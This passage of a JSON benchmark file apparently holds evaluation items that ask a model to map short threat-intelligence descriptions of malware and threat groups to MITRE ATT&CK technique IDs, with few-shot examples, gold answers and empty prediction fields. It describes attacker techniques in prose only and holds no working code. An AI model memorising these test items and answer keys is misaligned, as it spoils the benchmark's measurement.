Defenses - Disable or Modify Tools\n- Text: It continues to perform a number of checks for installed security products on the victim machine. The following security platforms are queried by checking entries within the HKLM\\Software\\ registry path\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "Clop can kill several processes and services related to backups and security solutions.", + "gold": "- T1489: Service Stop", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CallMe has the capability to create a reverse shell on victims.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: The ProgramArguments tell us where GrowlHelper is installed and that it takes at least one command line argument (-f). The RunAtLoad key confirms the implant will run every time the user logs in. To get an overview of the installation process, we can monitor file system activity for GrowlHelper events\n\t - T1546.004: Event Triggered Execution - Unix Shell Configuration Modification\n- Text: Endpoint Protection . Buckeye cyberespionage group shifts gaze from US to Hong Kong . Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Buckeye used a remote access Trojan (Backdoor.Pirpi) in attacks against a US organization\u2019s network in 2009. Symantec has identified additional tools used by the group, which will be discussed later. Organizations that Buckeye targeted over time, per region . Malware and tools . Buckeye uses a number of hacking tools as well as malware. Buckeye uses Backdoor.Pirpi, a remote access Trojan capable of reading, writing, and executing files and programs. As mentioned previously, Buckeye also uses a number of hacking tools, including the following: Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. On execution, the tool injects itself into lsass.exe and is triggered with the argument \u201cdig\u201d. OSinfo: OSInfo is a general purpose, system information gathering tool. It has the following command line argument help: ChromePass: A tool from NirSoft used for recovering passwords stored in the Chrome browser. This, coupled with the group\u2019s use of zero-day exploits in the past, customized tools, and the types of organizations being targeted would suggest that Buckeye is a state-sponsored cyberespionage group\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Green Lambert can use shell scripts for execution, such as \"/bin/sh -c\".", + "gold": "- T1059.004: Command and Scripting Interpreter - Unix Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Okrum's installer can attempt to achieve persistence by creating a scheduled task.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtask or crontab to create and schedule tasks that enumerate victim devices and networks.\n\t - T1053.003: Scheduled Task/Job - Cron\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers\n\t - T1559.001: Inter-Process Communication - Component Object Model\n", + "input": "QuasarRAT contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PLEAD has the ability to list open windows on the compromised host.\n\t - T1010: Application Window Discovery\n- Text: HAMMERTOSS has used \"-WindowStyle hidden\" to conceal PowerShell windows.\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: Attack overview . Flagpro is used in the initial stage of attacks to investigate target\u2019s environment, download a second stage malware and execute it. Flagpro communicates with a C&C server, and it receives commands to execute from the server, or Flagpro downloads a second stage malware and then executes it. Therefore, Flagpro may have already been used for attacking cases at that point. We call this sample using MFC as \u201cFlagpro v2.0\u201d and old one as \u201cFlagpro v1.0\u201d in this article. Once Flagpro is launched, it communicate with a C&C server and executes the received commands as shown in the above list. If it is not included in both Download Command fields in the command, Flagpro will not execute the main processes such as downloading, executing OS commands, collecting authentication information, and so on. If a Download Command field has \u201cExecYes\u201d, Flagpro downloads and executes the file. In requesting commands, sending execution results of OS commands or collected authentication information, Flagpro accesses a C&C server with specific URL paths and queries. Following image is an example of the response: Detections . To detect attacks using Flagpro, it is effective to create and install custom signature both on network and endpoint devices. In addition, the investigation commands after Flagpro establishes the connection with the C&C server like following are also useful for detection\n\t - T1069.001: Permission Groups Discovery - Local Groups\n", + "input": "Kazuar gathers information about opened windows.", + "gold": "- T1010: Application Window Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DLL side-loading has been used to execute through a legitimate Citrix executable ssonsvr.exe which is vulnerable to the technique. The Citrix executable was dropped along with by the dropper.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: Cobalt Strike's \"execute-assembly\" command can run a .NET executable within the memory of a sacrificial process by loading the CLR.\n\t - T1620: Reflective Code Loading\n- Text: The plugin is a Mimikatz version compiled in the Second_Release_PowerShell configuration. This version can be loaded into the address space of a PowerShell process via reflective DLL loading as implemented in the Exfiltration module of PowerSploit\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", + "input": "Chimera has used side loading to place malicious DLLs in memory.", + "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BadPatch uses SMTP for C2.\n\t - T1071.003: Application Layer Protocol - Mail Protocols\n- Text: One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1027: Obfuscated Files or Information\n\t - T1204.002: User Execution - Malicious File\n\t - T1221: Template Injection\n- Text: Sliver can use mutual TLS and RSA cryptography to exchange a session key.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n", + "input": "ComRAT can use email attachments for command and control.", + "gold": "- T1071.003: Application Layer Protocol - Mail Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: C2 Command Purpose reboot Reboot the system using shutdown command shutdown Shut down the system using shutdown command clean Wipe the Drives, C:\\, D:\\, E:\\, F:\\ screenshot Take a screenshot of the System upload Encrypt and upload the information from the system excel Leverage Excel.Application COM object for code execution outlook Leverage Outlook.Application COM object for code execution risk Leverage DCOM object for code execution Conclusion This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware\n\t - T1113: Screen Capture\n\t - T1082: System Information Discovery\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1106: Native API\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: HAWKBALL can collect the user name of the system.\n\t - T1033: System Owner/User Discovery\n- Text: Azorult can collect host IP information from the victim\u2019s machine.\n\t - T1016: System Network Configuration Discovery\n", + "input": "TrickBot gathers the OS version, machine name, CPU type, amount of RAM available, and UEFI/BIOS firmware information from the victim\u2019s machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: At the time of discovery TEARDROP was a novel concoction: never-before-seen, possibly even tailor-made for this attack. TEARDROP runs in-memory but it does register a Windows service, which involves editing the registry\n\t - T1112: Modify Registry\n- Text: When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named \u201cvmtoolsd.\u201d Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name \u2018MSASCuiLTasks\u2019 in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence\n\t - T1057: Process Discovery\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: MCMD has the ability to remove set Registry Keys, including those used for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "KOCTOPUS has added and deleted keys from the Registry.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SMOKEDHAM communicates with its C2 server using HTTPS. The backdoor uses domain fronting to obfuscate its true C2 server. The fronted domain is configured by an earlier stage of execution and the actual domain is hard-coded in the backdoor. Mandiant observed the fronted domain lumiahelptipsmscdnqa.microsoft[.]com and hard-coded domain max-ghoster1.azureedge[.]net used for C2 server communication\n\t - T1090.004: Proxy - Domain Fronting\n- Text: Pisloader uses DNS as its C2 protocol.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: Machete malware used FTP for C2.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n", + "input": "Mythic supports domain fronting via custom request headers.", + "gold": "- T1090.004: Proxy - Domain Fronting", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The REvil (also known as Sodinokibi) ransomware was first identified on April 17, 2019. It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. Secureworks\u00ae Counter Threat Unit\u2122 (CTU) analysis suggests that REvil is likely associated with the GandCrab ransomware due to similar code and the emergence of REvil as GandCrab activity declined. CTU\u2122 researchers attribute GandCrab to the GOLD GARDEN threat group\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n- Text: NotPetya's initial infection vector for the June 27, 2017 compromise was a backdoor in the Ukrainian tax accounting software M.E.Doc.\n\t - T1195: Supply Chain Compromise\n- Text: SUNBURST was digitally signed by SolarWinds from March - May 2020.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n", + "input": "CCBkdr was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.", + "gold": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis. We captured the commands we ran in Invoke-Obfuscation in the animation in Figure 3 below, which visualizes the steps the threat actor may have taken to create the payload delivered in this attack\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells.\n\t - T1546.004: Event Triggered Execution - Unix Shell Configuration Modification\n- Text: is capable of executing commands.\n\t - T1059: Command and Scripting Interpreter\n", + "input": "KeyBoy can launch interactive shells for communicating with the victim machine.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information.\n\t - T1484.002: Domain or Tenant Policy Modification - Trust Modification\n- Text: AADInternals can be used to create SAML tokens using the AD Federated Services token signing certificate.\n\t - T1606.002: Forge Web Credentials - SAML Tokens\n- Text: The threat actor used RDP on Active Directory using leaked accounts. The actor dropped scanning tools, Nmap.exe and Nping.exe, for scanning the network. Next, the scheduled task was pushed by the group policy domain machine.\n\t - T1484: Domain or Tenant Policy Modification\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "APT29 changed domain federation trust settings using Azure AD administrative permissions to configure the domain to accept authorization tokens signed by their own SAML signing certificate.", + "gold": "- T1484.002: Domain or Tenant Policy Modification - Trust Modification", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Turian has the ability to use HTTP for its C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Comnie encrypts command and control communications with RC4.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: TA551 has used encoded ASCII text for initial C2 communications.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "POWERTON has used HTTP/HTTPS for C2 traffic.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Systeminfo can be used to gather information about the operating system.\n\t - T1082: System Information Discovery\n- Text: dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.\n\t - T1005: Data from Local System\n- Text: Figure 6 shows the Glimpse server responding to an inbound beacon from the Glimpse agent and sending a command whoami\n\t - T1033: System Owner/User Discovery\n", + "input": "SHUTTERSPEED can collect system information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: njRAT is capable of manipulating and deleting registry keys, including those used for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: Before the driver is loaded, the malware disables crash dump by setting the following registry key\n\t - T1070: Indicator Removal\n\t - T1562.006: Impair Defenses - Indicator Blocking\n\t - T1112: Modify Registry\n- Text: A menuPass macro deletes files after it has decoded and decompressed them.\n\t - T1070.004: Indicator Removal - File Deletion\n", + "input": "KOCTOPUS can delete created registry keys used for persistence as part of its cleanup procedure.", + "gold": "- T1070.009: Indicator Removal - Clear Persistence", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Following the initial compromise, in many instances the BackdoorDiplomacy group employed open-source reconnaissance and red-team tools to evaluate the environment for additional targets of opportunity and lateral movement. Among the tools documented are\n\t - T1105: Ingress Tool Transfer\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: DanaBot is a modular malware that includes various additional modules; the most popular functionalities of these modules are stealing information from compromised machines and injecting fake forms into popular ecommerce and social media sites to collect payment data. It can also provide full access to infected systems with remote desktop, or mouse and keyboard access by utilizing a VNC plugin.\n\t - T1021.005: Remote Services - VNC\n\t - T1592: Gather Victim Host Information\n- Text: The payload file also checks for the Logmein event log in an attempt to encrypt files in remote machines or servers connected to the victim\u2019s machine. The path to the log file is hard-coded in the payload file, as shown here\n\t - T1219: Remote Access Software\n", + "input": "HEXANE has acquired, and sometimes customized, open source tools such as Mimikatz, Empire, VNC remote access software, and DIG.net.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire can enumerate antivirus software on the target.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555: Credentials from Password Stores\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others\n\t - T1047: Windows Management Instrumentation\n", + "input": "A module in Prikormka collects information from the victim about installed anti-virus software.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1124: System Time Discovery\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n", + "input": "RTM can detect if it is running within a sandbox or other virtualized analysis environment.", + "gold": "- T1497: Virtualization/Sandbox Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.003: OS Credential Dumping - NTDS\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes\n\t - T1003: OS Credential Dumping\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: MuddyWater has performed credential dumping with LaZagne.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n", + "input": "MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.", + "gold": "- T1003.001: OS Credential Dumping - LSASS Memory", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.\n\t - T1127.001: Trusted Developer Utilities Proxy Execution - MSBuild\n- Text: Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally.\n\t - T1047: Windows Management Instrumentation\n- Text: ComRAT has used \"cmd.exe\" to execute commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Frankenstein has used MSbuild to execute an actor-created file.", + "gold": "- T1127.001: Trusted Developer Utilities Proxy Execution - MSBuild", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Fysbis has masqueraded as trusted software rsyncd and dbus-inotifier.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.\n\t - T1203: Exploitation for Client Execution\n- Text: Icons were often folders, meant to trick targets into thinking they were opening a shortcut to a folder\n\t - T1036: Masquerading\n", + "input": "Pony has used the Adobe Reader icon for the downloaded file to look more trustworthy.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QuasarRAT can communicate over a reverse proxy using SOCKS5.\n\t - T1090: Proxy\n- Text: The Axiom group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate.\n\t - T1001: Data Obfuscation\n- Text: Operation Wocao can proxy traffic through multiple infected systems.\n\t - T1090.001: Proxy - Internal Proxy\n", + "input": "Operation Wocao has used a custom proxy tool called \"Agent\" which has support for multiple hops.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command\n\t - T1490: Inhibit System Recovery\n- Text: Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.\n\t - T1489: Service Stop\n- Text: No matching sample found for T1218.014\n", + "input": "Olympic Destroyer uses the native Windows utilities \"vssadmin\", \"wbadmin\", and \"bcdedit\" to delete and disable operating system recovery features such as the Windows backup catalog and Windows Automatic Repair.", + "gold": "- T1490: Inhibit System Recovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Honeybee, the threat actors had the ability to use FTP for C2.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n- Text: Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.\n\t - T1572: Protocol Tunneling\n- Text: Gain access to the victim\u2019s network by logging into a public-facing system via Secure Shell (SSH) using a local account <user sftp> acquired during previous credential theft activities. Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account. From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator\u2019s account\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n", + "input": "Cobalt Strike can conduct peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.", + "gold": "- T1071: Application Layer Protocol", + "predicted": "" + }, + { + "instruction": 